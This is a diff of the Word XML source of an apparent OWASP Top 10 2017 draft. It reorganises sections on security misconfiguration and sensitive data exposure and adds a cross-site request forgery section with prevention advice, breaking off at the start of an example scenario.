-          <w:numId w:val="1019"/>
-          <w:ilvl w:val="0"/>
-        </w:numPr>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">Is any of your software out of date? (see 2017-A9)</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="FirstParagraph"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">Without a concerted, repeatable application security configuration process, systems are at a higher risk.</w:t>
+        <w:t xml:space="preserve">Scenario #1: The app server admin console is automatically installed and not removed. Default accounts aren’t changed. Attacker discovers the standard admin pages are on your server, logs in with default passwords, and takes over.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="BodyText"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Scenario #2: Directory listing is not disabled on your web server. An attacker discovers they can simply list directories to find any file. The attacker finds and downloads all your compiled Java classes, which they decompile and reverse engineer to get all your custom code. Attacker then finds a serious access control flaw in your application.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="BodyText"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Scenario #3: App server configuration allows stack traces to be returned to users, potentially exposing underlying flaws such as framework versions that are known to be vulnerable.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="BodyText"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Scenario #4: App server comes with sample applications that are not removed from your production server. These sample applications have well known security flaws attackers can use to compromise your server.</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
-      <w:bookmarkStart w:id="83" w:name="how-do-i-prevent-4"/>
+      <w:bookmarkStart w:id="83" w:name="references-4"/>
       <w:bookmarkEnd w:id="83"/>
       <w:r>
-        <w:t xml:space="preserve">How do I prevent</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="FirstParagraph"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">The primary recommendations are to establish all of the following:</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:numPr>
-          <w:numId w:val="1020"/>
-          <w:ilvl w:val="0"/>
-        </w:numPr>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">A repeatable hardening process that makes it fast and easy to deploy another environment that is properly locked down. Development, QA, and production environments should all be configured identically (with different passwords used in each environment). This process should be automated to minimize the effort required to setup a new secure environment.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:numPr>
-          <w:numId w:val="1020"/>
-          <w:ilvl w:val="0"/>
-        </w:numPr>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">A process for keeping abreast of and deploying all new software updates and patches in a timely manner to each deployed environment. This process needs to include all components and libraries as well (see 2017-A9). Get get accustomed to new security features.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:numPr>
-          <w:numId w:val="1020"/>
-          <w:ilvl w:val="0"/>
-        </w:numPr>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">A strong application architecture that provides effective, secure separation between components.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:numPr>
-          <w:numId w:val="1020"/>
-          <w:ilvl w:val="0"/>
-        </w:numPr>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">An automated process to verify independently the efficiency of the configs and settings in all environments.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading2"/>
-      </w:pPr>
-      <w:bookmarkStart w:id="84" w:name="example-scenarios-4"/>
+        <w:t xml:space="preserve">References</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading3"/>
+      </w:pPr>
+      <w:bookmarkStart w:id="84" w:name="owasp-3"/>
       <w:bookmarkEnd w:id="84"/>
       <w:r>
-        <w:t xml:space="preserve">Example Scenarios</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="FirstParagraph"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">Scenario #1: The app server admin console is automatically installed and not removed. Default accounts aren’t changed. Attacker discovers the standard admin pages are on your server, logs in with default passwords, and takes over.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="BodyText"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">Scenario #2: Directory listing is not disabled on your web server. An attacker discovers they can simply list directories to find any file. The attacker finds and downloads all your compiled Java classes, which they decompile and reverse engineer to get all your custom code. Attacker then finds a serious access control flaw in your application.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="BodyText"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">Scenario #3: App server configuration allows stack traces to be returned to users, potentially exposing underlying flaws such as framework versions that are known to be vulnerable.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="BodyText"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">Scenario #4: App server comes with sample applications that are not removed from your production server. These sample applications have well known security flaws attackers can use to compromise your server.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading2"/>
-      </w:pPr>
-      <w:bookmarkStart w:id="85" w:name="references-4"/>
-      <w:bookmarkEnd w:id="85"/>
-      <w:r>
-        <w:t xml:space="preserve">References</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading3"/>
-      </w:pPr>
-      <w:bookmarkStart w:id="86" w:name="owasp-3"/>
-      <w:bookmarkEnd w:id="86"/>
-      <w:r>
         <w:t xml:space="preserve">OWASP</w:t>
       </w:r>
     </w:p>
@@ -4139,7 +4122,7 @@
           <w:ilvl w:val="0"/>
         </w:numPr>
       </w:pPr>
-      <w:hyperlink r:id="rId40">
+      <w:hyperlink r:id="rId38">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -4156,7 +4139,7 @@
           <w:ilvl w:val="0"/>
         </w:numPr>
       </w:pPr>
-      <w:hyperlink r:id="rId40">
+      <w:hyperlink r:id="rId38">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -4173,7 +4156,7 @@
           <w:ilvl w:val="0"/>
         </w:numPr>
       </w:pPr>
-      <w:hyperlink r:id="rId40">
+      <w:hyperlink r:id="rId38">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -4190,7 +4173,7 @@
           <w:ilvl w:val="0"/>
         </w:numPr>
       </w:pPr>
-      <w:hyperlink r:id="rId40">
+      <w:hyperlink r:id="rId38">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -4203,8 +4186,8 @@
       <w:pPr>
         <w:pStyle w:val="Heading3"/>
       </w:pPr>
-      <w:bookmarkStart w:id="87" w:name="external-3"/>
-      <w:bookmarkEnd w:id="87"/>
+      <w:bookmarkStart w:id="85" w:name="external-3"/>
+      <w:bookmarkEnd w:id="85"/>
       <w:r>
         <w:t xml:space="preserve">External</w:t>
       </w:r>
@@ -4249,8 +4232,8 @@
       <w:pPr>
         <w:pStyle w:val="Heading1"/>
       </w:pPr>
-      <w:bookmarkStart w:id="88" w:name="a6-sensitive-information-disclosure"/>
-      <w:bookmarkEnd w:id="88"/>
+      <w:bookmarkStart w:id="86" w:name="a6-sensitive-information-disclosure"/>
+      <w:bookmarkEnd w:id="86"/>
       <w:r>
         <w:t xml:space="preserve">A6 Sensitive Information Disclosure</w:t>
       </w:r>
@@ -4499,10 +4482,198 @@
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
-      <w:bookmarkStart w:id="89" w:name="am-i-vulnerable-to-attack-5"/>
+      <w:bookmarkStart w:id="87" w:name="am-i-vulnerable-to-attack-5"/>
+      <w:bookmarkEnd w:id="87"/>
+      <w:r>
+        <w:t xml:space="preserve">Am I vulnerable to attack?</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="FirstParagraph"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">The first thing you have to determine is which data is sensitive enough to require extra protection. For example, passwords, credit card numbers, health records, and personal information should be protected. For all such data:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Compact"/>
+        <w:numPr>
+          <w:numId w:val="1023"/>
+          <w:ilvl w:val="0"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Is any of this data stored in clear text long term, including backups of this data?</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Compact"/>
+        <w:numPr>
+          <w:numId w:val="1023"/>
+          <w:ilvl w:val="0"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Is any data of a site transmitted in clear text, internally or externally? Internet traffic is especially dangerous.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Compact"/>
+        <w:numPr>
+          <w:numId w:val="1023"/>
+          <w:ilvl w:val="0"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Are any old / weak cryptographic algorithms used? E.g. that may be provided by standard configs (see A5)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Compact"/>
+        <w:numPr>
+          <w:numId w:val="1023"/>
+          <w:ilvl w:val="0"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Are weak crypto keys generated, or is proper key management or rotation missing?</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Compact"/>
+        <w:numPr>
+          <w:numId w:val="1023"/>
+          <w:ilvl w:val="0"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Is encryption not enforced, e.g. are any (browser) security directives or headers missing?</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="FirstParagraph"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">And more … For a more complete set of problems to avoid, see ASVS areas Crypto (V7), Data Prot (V9), and SSL/TLS (V10).</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading2"/>
+      </w:pPr>
+      <w:bookmarkStart w:id="88" w:name="how-do-i-prevent-5"/>
+      <w:bookmarkEnd w:id="88"/>
+      <w:r>
+        <w:t xml:space="preserve">How do I prevent</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="FirstParagraph"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Do the following, at a minimum and consult the references:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Compact"/>
+        <w:numPr>
+          <w:numId w:val="1024"/>
+          <w:ilvl w:val="0"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Make sure you encrypt all sensitive data at rest or transferred via clients, e.g. cookies, tokens.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Compact"/>
+        <w:numPr>
+          <w:numId w:val="1024"/>
+          <w:ilvl w:val="0"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Encrypt all data in transit on application layer at least if any sensitive data may be transferred, e.g using TLS. Enforce this using directives like HTTP Strict Transport Security (HSTS).</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Compact"/>
+        <w:numPr>
+          <w:numId w:val="1024"/>
+          <w:ilvl w:val="0"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Don’t store sensitive data unnecessarily. Discard it as soon as possible. Data you don’t retain can’t be stolen.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Compact"/>
+        <w:numPr>
+          <w:numId w:val="1024"/>
+          <w:ilvl w:val="0"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Ensure strong standard algorithms or ciphers, parameters, protocols and keys are used, and proper key management is in place. Consider using FIPS 140 validated cryptographic modules.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Compact"/>
+        <w:numPr>
+          <w:numId w:val="1024"/>
+          <w:ilvl w:val="0"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Ensure passwords are stored with a strong adaptive algorithm appropriate for password protection, such as Argon2i, scrypt, bcrypt and PBKDF2. Also be sure to set the work factor (delay factor) as high as you can tolerate.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Compact"/>
+        <w:numPr>
+          <w:numId w:val="1024"/>
+          <w:ilvl w:val="0"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Disable autocomplete on forms requesting sensitive data and disable caching for pages that contain sensitive data.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Compact"/>
+        <w:numPr>
+          <w:numId w:val="1024"/>
+          <w:ilvl w:val="0"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Verify independently the efficiency of your settings.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading2"/>
+      </w:pPr>
+      <w:bookmarkStart w:id="89" w:name="example-scenarios-5"/>
       <w:bookmarkEnd w:id="89"/>
       <w:r>
-        <w:t xml:space="preserve">Am I vulnerable to attack?</w:t>
+        <w:t xml:space="preserve">Example Scenarios</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4510,230 +4681,42 @@
         <w:pStyle w:val="FirstParagraph"/>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">The first thing you have to determine is which data is sensitive enough to require extra protection. For example, passwords, credit card numbers, health records, and personal information should be protected. For all such data:</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Compact"/>
-        <w:numPr>
-          <w:numId w:val="1023"/>
-          <w:ilvl w:val="0"/>
-        </w:numPr>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">Is any of this data stored in clear text long term, including backups of this data?</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Compact"/>
-        <w:numPr>
-          <w:numId w:val="1023"/>
-          <w:ilvl w:val="0"/>
-        </w:numPr>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">Is any data of a site transmitted in clear text, internally or externally? Internet traffic is especially dangerous.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Compact"/>
-        <w:numPr>
-          <w:numId w:val="1023"/>
-          <w:ilvl w:val="0"/>
-        </w:numPr>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">Are any old / weak cryptographic algorithms used? E.g. that may be provided by standard configs (see A5)</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Compact"/>
-        <w:numPr>
-          <w:numId w:val="1023"/>
-          <w:ilvl w:val="0"/>
-        </w:numPr>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">Are weak crypto keys generated, or is proper key management or rotation missing?</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Compact"/>
-        <w:numPr>
-          <w:numId w:val="1023"/>
-          <w:ilvl w:val="0"/>
-        </w:numPr>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">Is encryption not enforced, e.g. are any (browser) security directives or headers missing?</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="FirstParagraph"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">And more … For a more complete set of problems to avoid, see ASVS areas Crypto (V7), Data Prot (V9), and SSL/TLS (V10).</w:t>
+        <w:t xml:space="preserve">Scenario #1: An application encrypts credit card numbers in a database using automatic database encryption. However, this data is automatically decrypted when retrieved, allowing an SQL injection flaw to retrieve credit card numbers in clear text. Alternatives include not storing credit card numbers, using tokenization, or using public key encryption.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="BodyText"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Scenario #2: A site simply doesn’t use or enforce TLS for all pages. An attacker simply monitors network traffic or strips the TLS (like an open wireless network), and steals the user’s session cookie. The attacker then replays this cookie and hijacks the user’s (authenticated) session, accessing the user’s private data.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="BodyText"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Scenario #3: The password database uses unsalted hashes to store everyone’s passwords. A file upload flaw allows an attacker to retrieve the password database. All of the unsalted hashes can be exposed with a rainbow table of precalculated hashes.</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
-      <w:bookmarkStart w:id="90" w:name="how-do-i-prevent-5"/>
+      <w:bookmarkStart w:id="90" w:name="references-5"/>
       <w:bookmarkEnd w:id="90"/>
       <w:r>
-        <w:t xml:space="preserve">How do I prevent</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="FirstParagraph"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">Do the following, at a minimum and consult the references:</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Compact"/>
-        <w:numPr>
-          <w:numId w:val="1024"/>
-          <w:ilvl w:val="0"/>
-        </w:numPr>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">Make sure you encrypt all sensitive data at rest or transferred via clients, e.g. cookies, tokens.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Compact"/>
-        <w:numPr>
-          <w:numId w:val="1024"/>
-          <w:ilvl w:val="0"/>
-        </w:numPr>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">Encrypt all data in transit on application layer at least if any sensitive data may be transferred, e.g using TLS. Enforce this using directives like HTTP Strict Transport Security (HSTS).</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Compact"/>
-        <w:numPr>
-          <w:numId w:val="1024"/>
-          <w:ilvl w:val="0"/>
-        </w:numPr>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">Don’t store sensitive data unnecessarily. Discard it as soon as possible. Data you don’t retain can’t be stolen.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Compact"/>
-        <w:numPr>
-          <w:numId w:val="1024"/>
-          <w:ilvl w:val="0"/>
-        </w:numPr>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">Ensure strong standard algorithms or ciphers, parameters, protocols and keys are used, and proper key management is in place. Consider using FIPS 140 validated cryptographic modules.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Compact"/>
-        <w:numPr>
-          <w:numId w:val="1024"/>
-          <w:ilvl w:val="0"/>
-        </w:numPr>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">Ensure passwords are stored with a strong adaptive algorithm appropriate for password protection, such as Argon2i, scrypt, bcrypt and PBKDF2. Also be sure to set the work factor (delay factor) as high as you can tolerate.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Compact"/>
-        <w:numPr>
-          <w:numId w:val="1024"/>
-          <w:ilvl w:val="0"/>
-        </w:numPr>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">Disable autocomplete on forms requesting sensitive data and disable caching for pages that contain sensitive data.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Compact"/>
-        <w:numPr>
-          <w:numId w:val="1024"/>
-          <w:ilvl w:val="0"/>
-        </w:numPr>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">Verify independently the efficiency of your settings.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading2"/>
-      </w:pPr>
-      <w:bookmarkStart w:id="91" w:name="example-scenarios-5"/>
+        <w:t xml:space="preserve">References</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading3"/>
+      </w:pPr>
+      <w:bookmarkStart w:id="91" w:name="owasp-4"/>
       <w:bookmarkEnd w:id="91"/>
       <w:r>
-        <w:t xml:space="preserve">Example Scenarios</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="FirstParagraph"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">Scenario #1: An application encrypts credit card numbers in a database using automatic database encryption. However, this data is automatically decrypted when retrieved, allowing an SQL injection flaw to retrieve credit card numbers in clear text. Alternatives include not storing credit card numbers, using tokenization, or using public key encryption.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="BodyText"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">Scenario #2: A site simply doesn’t use or enforce TLS for all pages. An attacker simply monitors network traffic or strips the TLS (like an open wireless network), and steals the user’s session cookie. The attacker then replays this cookie and hijacks the user’s (authenticated) session, accessing the user’s private data.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="BodyText"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">Scenario #3: The password database uses unsalted hashes to store everyone’s passwords. A file upload flaw allows an attacker to retrieve the password database. All of the unsalted hashes can be exposed with a rainbow table of precalculated hashes.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading2"/>
-      </w:pPr>
-      <w:bookmarkStart w:id="92" w:name="references-5"/>
-      <w:bookmarkEnd w:id="92"/>
-      <w:r>
-        <w:t xml:space="preserve">References</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading3"/>
-      </w:pPr>
-      <w:bookmarkStart w:id="93" w:name="owasp-4"/>
-      <w:bookmarkEnd w:id="93"/>
-      <w:r>
         <w:t xml:space="preserve">OWASP</w:t>
       </w:r>
     </w:p>
@@ -4745,7 +4728,7 @@
           <w:ilvl w:val="0"/>
         </w:numPr>
       </w:pPr>
-      <w:hyperlink r:id="rId40">
+      <w:hyperlink r:id="rId38">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -4762,7 +4745,7 @@
           <w:ilvl w:val="0"/>
         </w:numPr>
       </w:pPr>
-      <w:hyperlink r:id="rId40">
+      <w:hyperlink r:id="rId38">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -4779,7 +4762,7 @@
           <w:ilvl w:val="0"/>
         </w:numPr>
       </w:pPr>
-      <w:hyperlink r:id="rId40">
+      <w:hyperlink r:id="rId38">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -4796,7 +4779,7 @@
           <w:ilvl w:val="0"/>
         </w:numPr>
       </w:pPr>
-      <w:hyperlink r:id="rId40">
+      <w:hyperlink r:id="rId38">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -4809,8 +4792,8 @@
       <w:pPr>
         <w:pStyle w:val="Heading3"/>
       </w:pPr>
-      <w:bookmarkStart w:id="94" w:name="external-4"/>
-      <w:bookmarkEnd w:id="94"/>
+      <w:bookmarkStart w:id="92" w:name="external-4"/>
+      <w:bookmarkEnd w:id="92"/>
       <w:r>
         <w:t xml:space="preserve">External</w:t>
       </w:r>
@@ -4867,10 +4850,10 @@
       <w:pPr>
         <w:pStyle w:val="Heading1"/>
       </w:pPr>
-      <w:bookmarkStart w:id="95" w:name="a7-tba"/>
-      <w:bookmarkEnd w:id="95"/>
-      <w:r>
-        <w:t xml:space="preserve">A7 TBA</w:t>
+      <w:bookmarkStart w:id="93" w:name="a8-cross-site-request-forgery"/>
+      <w:bookmarkEnd w:id="93"/>
+      <w:r>
+        <w:t xml:space="preserve">A8 Cross site request forgery</w:t>
       </w:r>
     </w:p>
     <w:tbl>
@@ -5117,10 +5100,98 @@
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
-      <w:bookmarkStart w:id="96" w:name="am-i-vulnerable-to-attack-6"/>
+      <w:bookmarkStart w:id="94" w:name="am-i-vulnerable-to-csrf"/>
+      <w:bookmarkEnd w:id="94"/>
+      <w:r>
+        <w:t xml:space="preserve">Am I vulnerable to CSRF</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="FirstParagraph"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">To check whether an application is vulnerable, see if any links and forms lack an unpredictable CSRF token. Without such a token, attackers can forge malicious requests. An alternate defense is to require the user to prove they intended to submit the request, such as through reauthentication.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="BodyText"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Focus on the links and forms that invoke state-changing functions, since those are the most important CSRF targets. Multistep transactions are not inherently immune. Also be aware that Server-Side Request Forgery (SSRF) is also possible by tricking apps and APIs into generating arbitrary HTTP requests.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="BodyText"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Note that session cookies, source IP addresses, and other information automatically sent by the browser don’t defend against CSRF since they are included in the forged requests.</w:t>
+      </w:r>
+      <w:r>
+        <w:br w:type="textWrapping"/>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">OWASP’s CSRF Tester tool can help generate test cases to demonstrate the dangers of CSRF flaws.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading2"/>
+      </w:pPr>
+      <w:bookmarkStart w:id="95" w:name="how-do-i-prevent-6"/>
+      <w:bookmarkEnd w:id="95"/>
+      <w:r>
+        <w:t xml:space="preserve">How do I prevent</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="FirstParagraph"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">The preferred option is to use an existing CSRF defense. Many frameworks now include built in CSRF defenses, such as Spring, Play, Django, and AngularJS. Some web development languages, such as .NET do so as well. OWASP’s CSRF Guard can automatically add CSRF defenses to Java apps. OWASP’s CSRFProtector does the same for PHP or as an Apache filter.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="BodyText"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Otherwise, preventing CSRF usually requires the inclusion of an unpredictable token in each HTTP request. Such tokens should, at a minimum, be unique per user session.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="BodyText"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">The preferred option is to include the unique token in a hidden field. This includes the value in the body of the HTTP request, avoiding its exposure in the URL.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="BodyText"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">The unique token can also be included in the URL or a parameter. However, this runs the risk that the token will be exposed to an attacker.</w:t>
+      </w:r>
+      <w:r>
+        <w:br w:type="textWrapping"/>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">Consider using the “SameSite=strict” flag on all cookies, which is increasingly supported in browsers.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading2"/>
+      </w:pPr>
+      <w:bookmarkStart w:id="96" w:name="example-attack-scenarios"/>
       <w:bookmarkEnd w:id="96"/>
       <w:r>
-        <w:t xml:space="preserve">Am I vulnerable to attack?</w:t>
+        <w:t xml:space="preserve">Example Attack Scenarios</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5128,62 +5199,84 @@
         <w:pStyle w:val="FirstParagraph"/>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">TBA</w:t>
+        <w:t xml:space="preserve">The application allows a user to submit a state changing request that does not include anything secret. For example:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Compact"/>
+        <w:numPr>
+          <w:numId w:val="1027"/>
+          <w:ilvl w:val="0"/>
+        </w:numPr>
+      </w:pPr>
+      <w:hyperlink r:id="rId38">
+        <w:r>
+          <w:rPr>
